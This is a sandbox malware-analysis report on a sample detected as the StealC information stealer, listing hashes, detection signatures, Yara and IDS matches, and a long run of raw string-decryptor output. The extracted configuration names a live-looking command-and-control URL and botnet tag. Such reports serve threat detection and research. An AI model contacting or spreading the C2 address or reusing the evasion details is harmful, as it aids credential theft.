Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XJQkTVvJ3I.exe

Overview

General Information

Sample name:XJQkTVvJ3I.exe
renamed because original name is a hash value
Original sample name:85bb8945ac7b0a1ceeb1f3783168b6ea.exe
Analysis ID:1546474
MD5:85bb8945ac7b0a1ceeb1f3783168b6ea
SHA1:c8f62675f94208f80d9ac054963e87583cf01680
SHA256:78f70275d462340e3f57293641aedd5de6112df4b51c1d9d11d35676260c147c
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • XJQkTVvJ3I.exe (PID: 6588 cmdline: "C:\Users\user\Desktop\XJQkTVvJ3I.exe" MD5: 85BB8945AC7B0A1CEEB1F3783168B6EA)
    • WerFault.exe (PID: 7116 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6588 -s 1332 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.235.128.16/562c1eb14955c897.php", "Botnet": "LogsDiller"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.1929328076.0000000000840000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x778:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    00000000.00000002.1929447405.00000000009BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.1929017160.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.1929625361.0000000002450000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.XJQkTVvJ3I.exe.2450e67.2.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.XJQkTVvJ3I.exe.2450e67.2.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.3.XJQkTVvJ3I.exe.2530000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.3.XJQkTVvJ3I.exe.2530000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    0.2.XJQkTVvJ3I.exe.400000.1.unpackJoeSecurity_StealcYara detected StealcJoe Security
                      Click to see the 1 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-01T00:27:16.904776+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449737TCP
                      2024-11-01T00:27:55.791732+010020229301A Network Trojan was detected172.202.163.200443192.168.2.449743TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-01T00:27:00.114024+010020442431Malware Command and Control Activity Detected192.168.2.449730185.235.128.1680TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: XJQkTVvJ3I.exeAvira: detected
                      Found malware configuration
                      Source: 00000000.00000003.1667894126.0000000002530000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://185.235.128.16/562c1eb14955c897.php", "Botnet": "LogsDiller"}
                      Multi AV Scanner detection for submitted file
                      Source: XJQkTVvJ3I.exeReversingLabs: Detection: 39%
                      AI detected suspicious sample
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Machine Learning detection for sample
                      Source: XJQkTVvJ3I.exeJoe Sandbox ML: detected
                      Sample uses string decryption to hide its real strings
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !\%s
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: wsws
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: RO
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor:
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ~~~tuvxyz{|}~
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: tuvwx9;9|}@AB
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: NOPXYSTUVW\]^4444<<fgh:>>::66pqr TUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVWXYSTUVVZZT\\\\TTBFFBBNNrvvrr~~()*xxxxxhh234fbbnnb)qrs'!#!/!2o
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: i000000dplmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklmnopqrsijklllltttt```````````|||tttNRRVV&NBBFFBB^^BB2Z^^ZZVVJs
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 0000000%'%;=?=;%'%>::&&**.ege~zzffjjz
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 6*[HACAGACAOAC@
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: }567N/
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: VLstXJ@soL
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: qQJ[De@ugg6NUI
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: o/t:9m29
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: +,
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 'r eres6l
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: )ntT.
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 0ken
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: :XO+42=$4P:0:
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: %7OMa+:vi"
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor:
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: @\MBY_JHMV@FIRBKKHYP@WZTB_OM
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: PM
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: [UJJKYIRBKKPLH_@
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: CYBP
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: CHJ]ZB]KICJ]BOK
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: MK]TPLH]_TN
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: #O1OM
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: *.*
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ys\*r*
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: =.aged0t\
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: .metCdata-v2
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: DQexte0E+
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: @z[WBRJM|d9
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: *
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 033(5?09.K
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: (
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ^1EGPcodiNGTUQ[64">
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: x:P46k
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: L0
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 2/'2!-!4!#(2/-%n$,,
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: tuvwxyz{|}@A<tuvz{|}@ABt
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: JKLMNOXYZ[`abcde<<444<44nopqrsZ[\]^WXYZ[\]^WXYZ[\]^WXYZ[\]^WXYZ[\]^WXYZ[\]^WXYZ[\]^WXYZ[\]^WXYZ[\]^WXYZ[\]^WXXRRVVRZVVLLDDDvzz$%&'()pppppxhh234567bbf-/%+-uvwxyk5
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: defghijklmnrsqrsqrsqrsqrsqrsqrsqrsqrsqrsrvv```!"#$TTT()*+,-./012BFF6789:pqrstuyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: *..9;90000000000?=#%'%#-/-acagacaoacJM
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: _HEGEKMODLL]X
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: dTEDOVYK
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: e
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ~~~tuvxyz{|}~
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: t575;=?=;5IJK@AB
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: OPQRSWXYZ[\Z[\]<abcde<<4ijklm44,qrsZ[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\Z[\\\TTTLLLD!"#~~z'()*+vvr/0123nnj789:p+)/tuvwx#03
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: defghijklmnrsqrsqrsqrsqrsqrsqrsqrsqrsqrsrvv```!"#$TTT()*+,-./012BFF6789:pqrstuyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: .226622>>226}sqwqsqqbe
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: acagacaoacJMcdefJEDGFAmnB]qr~~uvGIKI89+/
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: '
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: '
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ' '
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor:
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ' '
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: g_XBX
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ~tuvwxyz~~z{|}~
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ?9EFGHIJK
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: OPQRSXYZ[\[\]^_::>>defgh3171mnopq((\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\]Z[\][Y_YPPPPIOIK!xxxx&'()*qwqs/0123nnjj89:pq((((vwxyk5
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: hijrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnopqrsmnnrrvvddd||||~zzffjj!"NJJVVZZ*+,@@@@@@@456ZVVJstu
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !"#$%&'()*+,-./0123456789:pqrstuvwxyko
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: "&&""..""&&"">>""&&"88*.WY[Y_Y[YWIZ]
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: wxyz0*00+31189+/
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: NN
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor:
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: Td,dLP=1/$v
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: Q7<
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: voRIMZNdi
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: *wm
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: apwdz=i9M
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: @z
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: u
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: m `NUO1
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: zqNZM5J
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: _ur~
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: tm`~]z
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: eeAN8PD
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: n
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: :hmwLf{$"#q2qj7|
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: b4~$ieo7`bV7XCt
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ccir62Z//+
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: OImh(
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: j
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 4UMLl}s
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: GetDeviceCaps
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: DNMQr
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: <`cp
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: '%1k[ki{(
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: is
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: )?3X#J;$9
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 3ti\{~
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: s`6ga{a0c
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: \FB[{nentrb
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: nY42
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: Y13.B
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: GL?/|dmFUv1A$
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: S39s;
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: Otxre
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 5rpFlykuavWsxY$%
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ys5rt!X"jK
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: INN5z
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: hm)e1r
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: {`WXTO!mnr8|oNF93
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: nk3F$pgVG
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: bZ$<#
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: GetLocalTime
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: qdBr}z
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: vlor
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: nbdhQisp1
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: OEWMy1AecMZB
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: tyO
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ]R
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ;8w.ncf6?*
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 2First
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: r
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: GetModuleFileNameA
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: DeleteFilEp
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: FindNextFileE
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: g/{ga9JH
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: =o1s(7ki)>:~]
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor:
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: .Q*
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ointer
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: EUHl~
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: Y~_
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: }r
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: YDG4=g|0{is`Rfht7
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: %.*+o-&O
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: rror
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: lWTo
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: WideCharToMultiBy\e
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: v|Pj`~Q|
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: l
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ^`
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: /jtf
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: lKj
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 9>
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: psapi.dll
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 1vD}|
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: \E.4*;pT
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: hkwnw
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 7xyk
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: NAX
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ra
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: kgRrK
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: !xaqR.~Ji}FI]Y OXW
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 4H2Q7U@
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 7Ud-smFpm
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: x_Vk&\zQ3REb3
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: Foh
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: =\0
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ts`nu`9SHhRh
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: khba
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: v~enx
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: i
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: xU'db9d;m
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: w`d{bseicbq}qgoz
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: U569$GNR
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: TrSzq?vvReRe
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: |2ZtwG
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: H**f*~3
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: cLtsO
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: TCMORYutbHkX4J
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: \
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: uT9fLc{p dos|1
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: GCDy=fm
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: s}o|HBDow
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 4aTv
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: yA(v
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: u.z}*4JY
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 4zf-|hcjS
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: r
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: w5Lru
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: jY1YX vntYOG
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: gxjKgfn.mW
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: OUjpL
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: l<payj
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: {>-+
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: gF7GJN{`uC
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: Gp`~UwhG
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: +sl
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: O9E&woV
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: Z=X;$4
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: ?BUQ3L
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: 'J{
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: T3[.}tY
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: Scb4
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: $x-Ded|
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: w
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: JqXwL
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: sqlite3_prepare_v2
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: eez7^~lp
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: d{g~
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: aovb9^`rfp
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: {s
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: efwEc{zzlO~
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: h-,sq!mW
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: n9Z,
                      Source: 0.2.XJQkTVvJ3I.exe.400000.1.raw.unpackString decryptor: aQY!_EkfN_
